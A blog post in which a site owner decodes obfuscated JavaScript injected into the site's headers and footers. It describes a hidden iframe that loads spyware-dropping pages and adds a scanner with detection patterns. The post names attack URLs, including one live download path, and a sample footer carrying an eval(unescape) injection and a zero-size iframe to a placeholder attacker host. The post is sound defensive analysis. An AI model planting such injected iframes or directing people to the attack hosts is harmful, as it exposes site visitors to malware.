Decoding obfuscated Javascript.
Today I woke up hoping that the malicious Javascript code would be gone from my site, but to my surprise it is still here. It's still in the Admin panel, but it's gone from the pages that all of you see (the public pages).
The code that I found implanted in my footers and headers was obfuscated Javascript. Obfuscated Javascript, for those of you who are not tech savvy, is Javascript code that has been deliberately scrambled (“encrypted”, loosely speaking) so that a human will have a hard time reading it, while a browser still runs it exactly as if it were normal Javascript.
Even though it's hard for a human to understand what the code means, it's still very easy to decode it. Here is how I did it.
Malicious Javascript

As you can see, that is the whole un-edited Malicious Javascript code that was planted on my footers and headers.
I can’t understand half of what it does right now but after I’m done with it, it’ll be transformed into plain old Javascript code.
Changing the code
After finding the code on my pages, I made a new .html page on my domain. I inserted the Javascript code that I found on my site, along with the DOCTYPE and the header title. I then looked for a part that said “eval” or “document.write”. I didn't find document.write, but I did find “Eval”, as you can see here:
And I changed it to “Alert”, like so:

The Code
After changing eval to alert, the browser no longer runs the decoded code when it reads the page. Instead, it makes an Alert pop up containing the decoded malicious Javascript. Obviously you would still need to actually know Javascript in order to understand what that code does; otherwise it's just random letters to you.

How it Works
What that code does is open an iFrame (an inline frame that contains another document) which loads a randomly generated page from the hacker's website (in this case gate4clicks.net) and hides that page from view. The hacker's page has more obfuscated code in it; it loads up some DirectX window and a Java application window, which then try to download a spyware program onto your computer. (I'm not entirely sure what it downloads, but this site did infect a computer; for privacy reasons I won't say whose. It starts to open some Command Prompt windows and some “Are you sure you want to install ‘example’?” pop-ups.)
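A check a site owner can run over theme header and footer files to flag the pattern described above: eval() fed by a decoder, and an iframe sized or styled to be invisible. This is an added example, not code from the post; the sample files, the indicator names and the placeholder host are all constructed here. Hits are leads for a manual look (and for the decoding step from the previous section), not proof of compromise.

```javascript
// Added example, not from the post: an indicator scanner for injected
// header/footer scripts. It does not decode anything; it only points at lines
// worth decoding and at hidden iframes already present in the markup.
const INDICATORS = [
  // eval fed by a decoder, the shape the post found in its footer
  { name: "eval-of-decoded-string",
    re: /eval\s*\(\s*(unescape|String\.fromCharCode|atob)\s*\(/i },
  // a long char-code array is suspicious on its own, even without eval on the line
  { name: "charcode-blob", re: /String\.fromCharCode\s*\((\s*\d+\s*,){15,}/ },
  // script or iframe markup injected through document.write
  { name: "document.write-markup", re: /document\.write\s*\([^)]*<\s*(script|iframe)/i },
  // an iframe sized or styled to be invisible: the "hidden page" the post describes
  { name: "hidden-iframe",
    re: /<iframe[^>]*(width\s*=\s*["']?0\b|height\s*=\s*["']?0\b|visibility\s*:\s*hidden|display\s*:\s*none)/i },
];

// Scan one file's text line by line; returns one {file, line, indicator} per hit.
function scanFile(file, text) {
  const hits = [];
  text.split(/\r?\n/).forEach((line, i) => {
    for (const ind of INDICATORS) {
      if (ind.re.test(line)) hits.push({ file, line: i + 1, indicator: ind.name });
    }
  });
  return hits;
}

// Scan a map of filename -> contents (in practice, read from the theme directory).
function scanFiles(files) {
  return Object.entries(files).flatMap(([file, text]) => scanFile(file, text));
}

// Constructed sample files: a clean header and a footer carrying an injected
// eval(unescape(...)) script plus the zero-size iframe it would write.
// "attacker.invalid" is a placeholder host.
const SAMPLE_FILES = {
  "header.php": [
    "<html><head><title>My blog</title>",
    '<script src="/js/jquery.js"></script></head>',
  ].join("\n"),
  "footer.php": [
    '<div id="footer">&copy; my site</div>',
    '<script>eval(unescape("%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%29"))</script>',
    '<iframe src="http://attacker.invalid/gate.php" width=0 height=0></iframe>',
    "</body></html>",
  ].join("\n"),
};

console.log(scanFiles(SAMPLE_FILES));
```

The indicators are deliberately loose; legitimate scripts sometimes use unescape() or fromCharCode, so treat a hit as a line to decode and read rather than as a verdict. Re-running the scan after cleanup is also the quickest way to tell whether the injection has come back, which is what the start of this post is about.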
Deleting the Spyware
The problem can be easily reverted if you use the Windows System Restore program regularly. If you don't know what that is, go to “Start” > “All Programs” > “Accessories” > “System Tools” > “System Restore”.
You can also delete the spyware if you have an anti-virus program, such as McAfee or Norton AntiVirus.
I also found that the website leaves a cookie, so I would suggest that you delete your Internet files as well. If you want a good program that does this, I suggest you download CCleaner, a free program. It does a great job of deleting private files.
The hack only works on Internet Explorer; if you have Firefox you are safe. But I would still suggest you delete your files and run a virus scan on your computer.
———————————————————————————–
EDIT
I am willing to bet that it's a kiddie hacker (a person who has no idea what they are doing when it comes to hacking, and just uses other people's programs to hack) trying to impress someone, since I just found a toolkit that does what I said above. It's sold for $20 on a Russian-hosted website. The toolkit is called “WebAttacker”. This will bring out some idiotic people trying to be hackers with programs they haven't even created. It's the return of the kiddies!
I found an article here that explains exactly what it does.
Another Edit
Here is a page of one of the sites that Hacked me.
try-count.net/dl/newnew.php?adv=194
The website contains some encoded malicious Javascript like this:
Code
And when decoded it comes out as:
Decoded (this file was edited, since even saved as a .txt file it would try to download a trojan called VBS/Psyme onto your computer)
As you can see, the website opens DirectX. There are many other lines, but the other ones were harder to decode.
New Edit
I just got a pop-up from McAfee saying they removed a trojan. Good job, kiddie. Make your own tools next time.
The name of the trojan is VBS/Psyme:
http://vil.nai.com/vil/content/v_100749.htm